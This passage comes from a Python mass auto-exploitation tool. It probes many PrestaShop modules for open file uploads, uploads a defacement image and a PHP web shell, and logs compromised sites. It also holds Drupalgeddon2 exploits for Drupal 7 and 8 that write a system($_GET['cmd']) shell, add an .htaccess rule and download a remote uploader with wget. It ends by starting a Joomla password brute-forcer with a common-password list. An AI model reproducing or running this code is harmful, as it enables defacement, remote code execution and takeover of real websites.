            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
                Index = GoT.text.encode('utf-8').split('|||')[0]
                # Debug print of the raw stored filename to stdout.
                print Index
                IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
                        Shell = Got2.text.encode('utf-8').split('|||')[0]
                        ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
                        CheckShell = requests.get('http://' + ShellPath, timeout=5)
                        if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                            self.Print_vuln_Shell(ShellPath)
                            with open('result/Shell_results.txt', 'a') as writer:
                                writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('attributewizardpro.OLD', site)
            else:
                self.Print_NotVuln('attributewizardpro.OLD', site)
        except:
            self.Print_NotVuln('attributewizardpro.OLD', site)
  2420.  
    def attributewizardpro_x(self, site):
        """Probe the ``attributewizardpro_x`` module directory's ``file_upload.php``.

        Same flow as ``attributewizardpro``; artifacts are expected under
        ``/modules/attributewizardpro_x/file_uploads/``.  The shell follow-up
        is gated on ``GoT`` rather than ``Got2``.  Exceptions are reported as
        not vulnerable.
        """
        try:
            Exp = site + '/modules/attributewizardpro_x/file_upload.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
                Index = GoT.text.encode('utf-8').split('|||')[0]
                # Debug print of the raw stored filename to stdout.
                print Index
                IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
                        Shell = Got2.text.encode('utf-8').split('|||')[0]
                        ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
                        CheckShell = requests.get('http://' + ShellPath, timeout=5)
                        if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                            self.Print_vuln_Shell(ShellPath)
                            with open('result/Shell_results.txt', 'a') as writer:
                                writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('attributewizardpro_x', site)
            else:
                self.Print_NotVuln('attributewizardpro_x', site)
        except:
            self.Print_NotVuln('attributewizardpro_x', site)
  2451.  
    def advancedslider(self, site):
        """Probe the advancedslider module's ``ajax_advancedsliderUpload.php``.

        The ``%26`` in ``Exp`` is a literally encoded ampersand, so the server
        receives a single ``action`` parameter whose value contains
        ``id_slide=php``; that exact string is what shows up in access logs.
        A 200 on a plain GET is the only precondition; ``self.Jce_Deface_image``
        is then posted as ``qqfile`` and expected at
        ``/modules/advancedslider/uploads/<basename>``.  Only the image is
        uploaded here -- there is no second-stage file.  A ``GIF89a`` hit is
        appended to ``result/Index_results.txt``; exceptions are reported as
        not vulnerable.
        """
        try:
            Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
            Checkvuln = requests.get('http://' + Exp, timeout=5)
            # Opened before the status check, so the handle leaks even on a non-200.
            FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
            if Checkvuln.status_code == 200:
                requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
                IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                else:
                    self.Print_NotVuln('advancedslider', site)
            else:
                self.Print_NotVuln('advancedslider', site)
        except:
            self.Print_NotVuln('advancedslider', site)
  2471.  
    def cartabandonmentpro(self, site):
        """Probe the cartabandonmentpro module's ``upload.php``.

        A 200 on a plain GET is the only precondition; ``self.Jce_Deface_image``
        is then posted as the ``image`` field and expected at
        ``/modules/cartabandonmentpro/uploads/<basename>``.  Image-only probe
        (no second-stage file).  A ``GIF89a`` hit is appended to
        ``result/Index_results.txt``; exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/cartabandonmentpro/upload.php'
            Checkvuln = requests.get('http://' + Exp, timeout=5)
            # Opened before the status check, so the handle leaks even on a non-200.
            FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
            if Checkvuln.status_code == 200:
                requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
                IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                else:
                    self.Print_NotVuln('cartabandonmentpro', site)
            else:
                self.Print_NotVuln('cartabandonmentpro', site)
        except:
            self.Print_NotVuln('cartabandonmentpro', site)
  2491.  
    def cartabandonmentproOld(self, site):
        """Probe the ``cartabandonmentproOld`` module directory's ``upload.php``.

        Same flow as ``cartabandonmentpro`` with the directory name changed;
        the image is posted as ``image`` and expected under
        ``/modules/cartabandonmentproOld/uploads/``.  Image-only probe.
        Exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/cartabandonmentproOld/upload.php'
            Checkvuln = requests.get('http://' + Exp, timeout=5)
            FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
            if Checkvuln.status_code == 200:
                requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
                IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                else:
                    self.Print_NotVuln('cartabandonmentproOld', site)
            else:
                self.Print_NotVuln('cartabandonmentproOld', site)
        except:
            self.Print_NotVuln('cartabandonmentproOld', site)
  2511.  
    def videostab(self, site):
        """Probe the videostab module's ``ajax_videostab.php``.

        As in ``advancedslider``, ``%26`` is a literally encoded ampersand, so
        ``action=submitUploadVideo%26id_product=upload`` reaches the server as
        one parameter value.  A 200 on a plain GET is the only precondition;
        ``self.Jce_Deface_image`` is posted as ``qqfile`` and expected at
        ``/modules/videostab/uploads/<basename>``.  Image-only probe.  A
        ``GIF89a`` hit is appended to ``result/Index_results.txt``; exceptions
        are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
            Checkvuln = requests.get('http://' + Exp, timeout=5)
            FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
            if Checkvuln.status_code == 200:
                requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
                IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                else:
                    self.Print_NotVuln('videostab', site)
            else:
                self.Print_NotVuln('videostab', site)
        except:
            self.Print_NotVuln('videostab', site)
  2531.  
    def wg24themeadministration(self, site):
        """Probe the wg24themeadministration module's ``wg24_ajax.php``.

        After a 200 on a plain GET, a multipart POST carries form fields
        ``data=bajatax`` / ``type=pattern_upload`` and the file under the field
        name ``bajatax`` -- a distinctive token for request-log matching.
        Uploads are expected under ``/modules/wg24themeadministration/img/upload/``;
        ``GIF89a`` confirms the image and only then is ``self.ShellPresta``
        posted and checked for ``Vuln!!``.  Hits go to
        ``result/Index_results.txt`` / ``result/Shell_results.txt``.  The
        ``Exl`` assignment sits outside the ``try``, so only the network and
        file operations are covered by the catch-all that reports not
        vulnerable.
        """
        Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
        try:
            Checkvuln = requests.get('http://' + Exl, timeout=5)
            if Checkvuln.status_code == 200:
                PostData = {'data': 'bajatax',
                            'type': 'pattern_upload'}
                FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
                FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
                uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
                uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
                requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
                CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(uploadedPathIndex)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(uploadedPathIndex + '\n')
                    requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
                    Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
                    if 'Vuln!!' in Checkshell.text.encode('utf-8'):
                        self.Print_vuln_Shell(uploadedPathShell)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(uploadedPathShell + '\n')
                else:
                    self.Print_NotVuln('wg24themeadministration', site)
            else:
                self.Print_NotVuln('wg24themeadministration', site)
        except:
            self.Print_NotVuln('wg24themeadministration', site)
  2561.  
  2562.  
    def fieldvmegamenu(self, site):
        """Probe the fieldvmegamenu module's ``ajax/upload.php``.

        After a 200 on a plain GET, files are posted under the array-style
        field name ``images[]``; uploads are expected under
        ``/modules/fieldvmegamenu/uploads/``.  ``GIF89a`` confirms the image
        and gates the ``self.ShellPresta`` upload, which is confirmed by
        ``Vuln!!``.  Hits go to ``result/Index_results.txt`` /
        ``result/Shell_results.txt``; exceptions inside the ``try`` are
        reported as not vulnerable.
        """
        Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
        try:
            Checkvuln = requests.get('http://' + Exl, timeout=5)
            if Checkvuln.status_code == 200:
                FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
                FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
                uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
                uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
                requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
                CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(uploadedPathIndex)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(uploadedPathIndex + '\n')
                    requests.post('http://' + Exl, files=FileDataShell, timeout=5)
                    Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
                    if 'Vuln!!' in Checkshell.text.encode('utf-8'):
                        self.Print_vuln_Shell(uploadedPathShell)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(uploadedPathShell + '\n')
                else:
                    self.Print_NotVuln('fieldvmegamenu', site)
            else:
                self.Print_NotVuln('fieldvmegamenu', site)
        except:
            self.Print_NotVuln('fieldvmegamenu', site)
  2590.  
    def wdoptionpanel(self, site):
        """Probe the wdoptionpanel module's ``wdoptionpanel_ajax.php``.

        Same shape as ``wg24themeadministration``: form fields ``data=bajatax``
        / ``type=image_upload`` plus the file under field ``bajatax``; uploads
        are expected under ``/modules/wdoptionpanel/upload/``.  ``GIF89a``
        confirms the image and gates the ``self.ShellPresta`` upload, confirmed
        by ``Vuln!!``.  Hits go to ``result/Index_results.txt`` /
        ``result/Shell_results.txt``; exceptions inside the ``try`` are
        reported as not vulnerable.
        """
        Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
        try:
            Checkvuln = requests.get('http://' + Exl, timeout=5)
            if Checkvuln.status_code == 200:
                PostData = {'data': 'bajatax',
                            'type': 'image_upload'}
                FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
                FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
                uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
                uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
                requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
                CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(uploadedPathIndex)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(uploadedPathIndex + '\n')
                    requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
                    Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
                    if 'Vuln!!' in Checkshell.text.encode('utf-8'):
                        self.Print_vuln_Shell(uploadedPathShell)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(uploadedPathShell + '\n')
                else:
                    self.Print_NotVuln('wdoptionpanel', site)
            else:
                self.Print_NotVuln('wdoptionpanel', site)
        except:
            self.Print_NotVuln('wdoptionpanel', site)
  2620.  
  2621.  
    def pk_flexmenu(self, site):
        """Probe the pk_flexmenu module's ``ajax/upload.php``.

        Same flow as ``fieldvmegamenu``: files posted under ``images[]`` after
        a 200 on a plain GET, uploads expected under
        ``/modules/pk_flexmenu/uploads/``, ``GIF89a`` gating the
        ``self.ShellPresta`` upload and ``Vuln!!`` confirming it.  Hits go to
        the two result files; exceptions inside the ``try`` are reported as
        not vulnerable.
        """
        Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
        try:
            Checkvuln = requests.get('http://' + Exl, timeout=5)
            if Checkvuln.status_code == 200:
                FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
                FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
                uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
                uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
                requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
                CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(uploadedPathIndex)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(uploadedPathIndex + '\n')
                    requests.post('http://' + Exl, files=FileDataShell, timeout=5)
                    Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
                    if 'Vuln!!' in Checkshell.text.encode('utf-8'):
                        self.Print_vuln_Shell(uploadedPathShell)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(uploadedPathShell + '\n')
                else:
                    self.Print_NotVuln('pk_flexmenu', site)
            else:
                self.Print_NotVuln('pk_flexmenu', site)
        except:
            self.Print_NotVuln('pk_flexmenu', site)
  2649.  
  2650.  
  2651. def nvn_export_orders(self, site):
  2652. Exl = site + '/modules/nvn_export_orders/upload.php'
  2653. try:
  2654. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2655. if Checkvuln.status_code == 200:
  2656. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
  2657. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
  2658. uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
  2659. uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
  2660. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2661. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2662. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2663. self.Print_Vuln_index(uploadedPathIndex)
  2664. with open('result/Index_results.txt', 'a') as writer:
  2665. writer.write(uploadedPathIndex + '\n')
  2666. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2667. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2668. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2669. self.Print_vuln_Shell(uploadedPathShell)
  2670. with open('result/Shell_results.txt', 'a') as writer:
  2671. writer.write(uploadedPathShell + '\n')
  2672. else:
  2673. self.Print_NotVuln('nvn_export_orders', site)
  2674. else:
  2675. self.Print_NotVuln('nvn_export_orders', site)
  2676. except:
  2677. self.Print_NotVuln('nvn_export_orders', site)
  2678.  
  2679. def megamenu(self, site):
  2680. try:
  2681. Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
  2682. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2683. FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  2684. if Checkvuln.status_code == 200:
  2685. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2686. IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
  2687. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2688. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2689. self.Print_Vuln_index(IndexPath)
  2690. with open('result/Index_results.txt', 'a') as writer:
  2691. writer.write(IndexPath + '\n')
  2692. else:
  2693. self.Print_NotVuln('megamenu', site)
  2694. else:
  2695. self.Print_NotVuln('megamenu', site)
  2696. except:
  2697. self.Print_NotVuln('megamenu', site)
  2698.  
  2699.  
  2700.  
  2701. def tdpsthemeoptionpanel(self, site):
  2702. Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
  2703. try:
  2704. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2705. if Checkvuln.status_code == 200:
  2706. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
  2707. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
  2708. uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
  2709. uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
  2710. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2711. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2712. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2713. self.Print_Vuln_index(uploadedPathIndex)
  2714. with open('result/Index_results.txt', 'a') as writer:
  2715. writer.write(uploadedPathIndex + '\n')
  2716. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2717. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2718. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2719. self.Print_vuln_Shell(uploadedPathShell)
  2720. with open('result/Shell_results.txt', 'a') as writer:
  2721. writer.write(uploadedPathShell + '\n')
  2722. else:
  2723. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2724. else:
  2725. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2726. except:
  2727. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2728.  
  2729. def psmodthemeoptionpanel(self, site):
  2730. Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
  2731. try:
  2732. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2733. if Checkvuln.status_code == 200:
  2734. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
  2735. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
  2736. uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
  2737. uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
  2738. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2739. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2740. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2741. self.Print_Vuln_index(uploadedPathIndex)
  2742. with open('result/Index_results.txt', 'a') as writer:
  2743. writer.write(uploadedPathIndex + '\n')
  2744. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2745. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2746. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2747. self.Print_vuln_Shell(uploadedPathShell)
  2748. with open('result/Shell_results.txt', 'a') as writer:
  2749. writer.write(uploadedPathShell + '\n')
  2750. else:
  2751. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2752. else:
  2753. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2754. except:
  2755. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2756.  
  2757.  
  2758. def lib(self, site):
  2759. Exl = site + '/modules/lib/redactor/file_upload.php'
  2760. try:
  2761. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2762. if Checkvuln.status_code == 200:
  2763. FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
  2764. FileDataShell = {'file': open(self.ShellPresta, 'rb')}
  2765. uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
  2766. uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
  2767. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2768. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2769. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2770. self.Print_Vuln_index(uploadedPathIndex)
  2771. with open('result/Index_results.txt', 'a') as writer:
  2772. writer.write(uploadedPathIndex + '\n')
  2773. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2774. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2775. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2776. self.Print_vuln_Shell(uploadedPathShell)
  2777. with open('result/Shell_results.txt', 'a') as writer:
  2778. writer.write(uploadedPathShell + '\n')
  2779. else:
  2780. self.Print_NotVuln('lib', site)
  2781. else:
  2782. self.Print_NotVuln('lib', site)
  2783. except:
  2784. self.Print_NotVuln('lib', site)
  2785.  
  2786. class DrupalGedden2(object):
  2787. def __init__(self, site):
  2788. self.r = '\033[31m'
  2789. self.g = '\033[32m'
  2790. self.y = '\033[33m'
  2791. self.b = '\033[34m'
  2792. self.m = '\033[35m'
  2793. self.c = '\033[36m'
  2794. self.w = '\033[37m'
  2795. self.rr = '\033[39m'
  2796. try:
  2797. CheckVersion = requests.get('http://' + site, timeout=5)
  2798. if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
  2799. self.Version7Drupal(site)
  2800. elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
  2801. self.Version8Drupal(site)
  2802. else:
  2803. self.Version7Drupal(site)
  2804. except:
  2805. self.Print_NotVuln('Drupalgeddon2', site)
  2806.  
  2807. def Print_NotVuln(self, NameVuln, site):
  2808. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
  2809.  
  2810. def Print_Vuln_index(self, indexPath):
  2811. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
  2812.  
  2813. def Print_vuln_Shell(self, shellPath):
  2814. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
  2815.  
  2816. def Version7Drupal(self, site):
  2817. try:
  2818. payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
  2819. PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
  2820. " echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
  2821. " echo '" + payloadshell + "'> vuln.php;" \
  2822. " cd sites/default/files/;" \
  2823. " echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
  2824. " wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
  2825. get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
  2826. 'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
  2827. post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
  2828.  
  2829. r = requests.post('http://' + site, data=post_params, params=get_params)
  2830. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  2831. if m:
  2832. found = m.group(1)
  2833. get_params = {'q': 'file/ajax/name/#value/' + found}
  2834. post_params = {'form_build_id': found}
  2835. requests.post('http://' + site, data=post_params, params=get_params)
  2836. a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
  2837. if 'Vuln!!' in a.text.encode('utf-8'):
  2838. self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
  2839. with open('result/Shell_results.txt', 'a') as writer:
  2840. writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
  2841. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
  2842. CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
  2843. if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
  2844. self.Print_vuln_Shell(site + '/sites/default/files/up.php')
  2845. with open('result/Shell_results.txt', 'a') as writer:
  2846. writer.write(site + '/sites/default/files/up.php' + '\n')
  2847. if 'Vuln!!' in gg.text.encode('utf-8'):
  2848. self.Print_Vuln_index(site + '/vuln.htm')
  2849. with open('result/Index_results.txt', 'a') as writer:
  2850. writer.write(site + '/vuln.htm' + '\n')
  2851. else:
  2852. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
  2853. if 'Vuln!!' in gg.text.encode('utf-8'):
  2854. self.Print_Vuln_index(site + '/vuln.htm')
  2855. with open('result/Index_results.txt', 'a') as writer:
  2856. writer.write(site + '/vuln.htm' + '\n')
  2857. Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
  2858. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2859. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
  2860. with open('result/Shell_results.txt', 'a') as writer:
  2861. writer.write(site + '/vuln.php?cmd=id' + '\n')
  2862. else:
  2863. self.Print_NotVuln('Drupalgeddon2', site)
  2864. else:
  2865. self.Print_NotVuln('Drupalgeddon2', site)
  2866. except:
  2867. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
  2868.  
  2869. def Version8Drupal(self, site):
  2870. try:
  2871. Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  2872. payloadshell = "<?php system($_GET['cmd']); ?>"
  2873.  
  2874. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  2875. 'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
  2876.  
  2877. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  2878. 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
  2879. r = requests.post('http://' + Exp, data=payload, timeout=5)
  2880. if r.status_code == 200:
  2881. a = requests.get('http://' + site + '/vuln.htm', timeout=5)
  2882. if 'Vuln!!' in a.text.encode('utf-8'):
  2883. requests.post('http://' + Exp, data=payload2, timeout=5)
  2884. CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
  2885. if CheckShell.status_code == 200:
  2886. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
  2887. with open('result/Shell_results.txt', 'a') as writer:
  2888. writer.write(site + '/vuln.php?cmd=id' + '\n')
  2889. self.Print_Vuln_index(site + '/vuln.htm')
  2890. with open('result/Index_results.txt', 'a') as writer:
  2891. writer.write(site + '/vuln.htm' + '\n')
  2892. else:
  2893. self.Print_Vuln_index(site + '/vuln.htm')
  2894. with open('result/Index_results.txt', 'a') as writer:
  2895. writer.write(site + '/vuln.htm' + '\n')
  2896. else:
  2897. self.Print_NotVuln('Drupalgeddon2', site)
  2898. else:
  2899. self.Print_NotVuln('Drupalgeddon2', site)
  2900. except:
  2901. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
  2902.  
  2903.  
  2904.  
  2905. class JooMLaBruteForce(object):
  2906. def __init__(self, site):
  2907. self.flag = 0
  2908. self.r = '\033[31m'
  2909. self.g = '\033[32m'
  2910. self.y = '\033[33m'
  2911. self.b = '\033[34m'
  2912. self.m = '\033[35m'
  2913. self.c = '\033[36m'
  2914. self.w = '\033[37m'
  2915. self.rr = '\033[39m'
  2916. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  2917. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  2918. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  2919. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  2920. "12", "123123"]
  2921. thread = []
  2922. for passwd in self.password:
  2923. t = threading.Thread(target=self.Joomla, args=(site, passwd))
